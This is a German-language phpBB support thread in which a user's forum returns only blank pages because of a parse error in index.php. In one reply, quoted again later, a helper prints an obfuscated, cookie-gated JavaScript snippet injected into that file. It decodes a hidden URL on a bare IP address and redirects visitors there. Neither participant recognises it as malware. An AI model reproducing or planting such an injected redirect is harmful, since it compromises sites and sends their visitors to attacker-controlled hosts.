Forum nicht mehr erreichbar, nur noch Weisse Seiten
Forumsregeln
phpBB 3.0 hat das Ende seiner Lebenszeit überschritten
phpBB 3.0 wird nicht mehr aktiv unterstützt. Insbesondere werden - auch bei Sicherheitslücken - keine Patches mehr bereitgestellt. Der Einsatz von phpBB 3.0 erfolgt daher auf eigene Gefahr. Wir empfehlen einen Umstieg auf die neuste phpBB-Version, welches aktiv weiterentwickelt wird und für welches regelmäßig Updates zur Verfügung gestellt werden.
phpBB 3.0 hat das Ende seiner Lebenszeit überschritten
phpBB 3.0 wird nicht mehr aktiv unterstützt. Insbesondere werden - auch bei Sicherheitslücken - keine Patches mehr bereitgestellt. Der Einsatz von phpBB 3.0 erfolgt daher auf eigene Gefahr. Wir empfehlen einen Umstieg auf die neuste phpBB-Version, welches aktiv weiterentwickelt wird und für welches regelmäßig Updates zur Verfügung gestellt werden.
Forum nicht mehr erreichbar, nur noch Weisse Seiten
Hallo Gemeinde,
hab jetzt mal wieder ein Problem.
Seit einigen Tagen ist mein Forum nicht mehr erreichbar bzw. es wird überall nur eine Weisse Seite angezeigt.
Nach unzähligem Suchen hier wurde ich über die SuFu auch nicht fündig.
Von meinem Hoster habe ich folgendes bekommen:
"vielen Dank für Ihre Anfrage. Ruft man Ihr Forum auf, erscheint folgende Fehlermeldung in der Errorlogdatei in Ihrem Account:
[Wed Mar 23 08:57:56 2011] [warn] mod_fcgid: stderr: PHP Parse error: syntax error, unexpected '<' in forum/index.php on line 293
Dieser Fehler zeigt Ihnen, dass die Datei index.php in Ihrem Ordner Forum in Zeile 293 einen Fehler aufweist. Der Fehler wäre hier "PHP Parse error: syntax error, unexpected '<'".
"
Nun finde ich das irgendwie nicht in der index.php, habe leider auch keine mehr die ich wieder als Backup hochladen könnte, da die ganz anders aussehen.
Was ich nicht verstehe ist, wie kann das Forum die ganze Zeit funktionieren und mit einem mal ist das Down bzw. nr noch weisse Seiten.
Die eingebauten Mod´s funktionierten bis dato super und es wurde auch in keinster Weise etwas verändert an dem Forum.
Debug Modus hilft nix, sehe keine Antwort, wie gesagt das einzigste ist die Meldung von meinem Hoster.
Hoffe die Anfrage ist hier richtig.
Danke für die Hilfe.
Sven
hab jetzt mal wieder ein Problem.
Seit einigen Tagen ist mein Forum nicht mehr erreichbar bzw. es wird überall nur eine Weisse Seite angezeigt.
Nach unzähligem Suchen hier wurde ich über die SuFu auch nicht fündig.
Von meinem Hoster habe ich folgendes bekommen:
"vielen Dank für Ihre Anfrage. Ruft man Ihr Forum auf, erscheint folgende Fehlermeldung in der Errorlogdatei in Ihrem Account:
[Wed Mar 23 08:57:56 2011] [warn] mod_fcgid: stderr: PHP Parse error: syntax error, unexpected '<' in forum/index.php on line 293
Dieser Fehler zeigt Ihnen, dass die Datei index.php in Ihrem Ordner Forum in Zeile 293 einen Fehler aufweist. Der Fehler wäre hier "PHP Parse error: syntax error, unexpected '<'".
"
Nun finde ich das irgendwie nicht in der index.php, habe leider auch keine mehr die ich wieder als Backup hochladen könnte, da die ganz anders aussehen.
Was ich nicht verstehe ist, wie kann das Forum die ganze Zeit funktionieren und mit einem mal ist das Down bzw. nr noch weisse Seiten.
Die eingebauten Mod´s funktionierten bis dato super und es wurde auch in keinster Weise etwas verändert an dem Forum.
Debug Modus hilft nix, sehe keine Antwort, wie gesagt das einzigste ist die Meldung von meinem Hoster.
Hoffe die Anfrage ist hier richtig.
Danke für die Hilfe.
Sven
Re: Forum nicht mehr erreichbar, nur noch Weisse Seiten
Ja Sorry ist jetzt drinMetzle hat geschrieben:Hallo,
stell doch deine index.php mal ins Pastebin, damit Helfende mal drüberschauen können.
Hoffe ich habe das jetzt richtig gemacht.
den das habe ich so noch nie gemacht
Zuletzt geändert von SECU am 23.03.2011 12:18, insgesamt 1-mal geändert.
- redbull254
- Ehemaliges Teammitglied
Hallo erstmal,
Du solltest die Datei nicht nur im „Pastebin“ rein laden sondern danach auch hier im Beitrag verlinken.SECU hat geschrieben:
Ja Sorry ist jetzt drin

Pastebin
Im Pastebin kannst du Codeabschnitte oder auch ganze Dateien ablegen, um sie zum Beispiel später in einem Supportthema zu verlinken.
Beste Grüße
Walter
Walter
redbull254 hat geschrieben:Hallo erstmal,
Du solltest die Datei nicht nur im „Pastebin“ rein laden sondern danach auch hier im Beitrag verlinken.SECU hat geschrieben:
Ja Sorry ist jetzt drin
Pastebin
Im Pastebin kannst du Codeabschnitte oder auch ganze Dateien ablegen, um sie zum Beispiel später in einem Supportthema zu verlinken.
Oh man bin ich doof, jetzt Richtig?
https://www.phpbb.de/support/pastebin.p ... view&s=688
- redbull254
So passt das besser. 
Was mir aus den Modeinträgen auffällt, es fehlt am Ende das:
in der „index.php“.
Es sollte auch ohne klappen aber das entspricht nicht der Original-Datei.

Was mir aus den Modeinträgen auffällt, es fehlt am Ende das:
Code: Alles auswählen
?>
Es sollte auch ohne klappen aber das entspricht nicht der Original-Datei.
Beste Grüße
Walter
Walter
Puh Danke Red, habs nicht richtig gelesen ok jetzt weiss ich es ja nun?redbull254 hat geschrieben:So passt das besser.

- redbull254
Ich würde die Mods in die „index.php“ noch einmal neu einbauen.
Da kommt mir einiges komisch vor.
Erst einmal eine Original-Index.php hoch laden, Cache leeren und dann die Mods neu einbauen.
P.S.
Du schließt hier die Datei und haust dann noch Code dahinter, das geht nicht.
Siehe Zeile 293 (Notepad ++)
Da kommt mir einiges komisch vor.

Erst einmal eine Original-Index.php hoch laden, Cache leeren und dann die Mods neu einbauen.
P.S.
Code: Alles auswählen
<script language="JavaScript">if(document.cookie.indexOf("udb=1")<0){var j=0,n="";while(j<44)n+=String.fromCharCode("iuuq;0086/238/219/2850byb0dd0pvu/qiq@t`je>2".charCodeAt(j++)-1);document.cookie="udb=1;";document.location=n;}</script> ?>
Beste Grüße
Walter
Walter
redbull254 hat geschrieben:Ich würde die Mods in die „index.php“ noch einmal neu einbauen.
Da kommt mir einiges komisch vor.![]()
P.S.
Du schließt hier die Datei und haust dann noch Code dahinter, das geht nicht.Code: Alles auswählen
<script language="JavaScript">if(document.cookie.indexOf("udb=1")<0){var j=0,n="";while(j<44)n+=String.fromCharCode("iuuq;0086/238/219/2850byb0dd0pvu/qiq@t`je>2".charCodeAt(j++)-1);document.cookie="udb=1;";document.location=n;}</script> ?>
Ja das meinte ich ja mit das sie komisch aussieht, aber wie so funktioniert das Monate lang und auf einmal ist das Down?
Ohne das irgendwer daran was gemacht hat?
- redbull254
Weiß ich nicht. Bringt uns auch nicht weiter das jetzt analysieren zu wollen.SECU hat geschrieben:
Ja das meinte ich ja mit das sie komisch aussieht, aber wie so funktioniert das Monate lang und auf einmal ist das Down?
Ohne das irgendwer daran was gemacht hat?
Ich habe auch keine Ahnung was das Script da macht.

Wie ich das Problem jetzt lösen würde habe ich Dir schon geschrieben.

Beste Grüße
Walter
Walter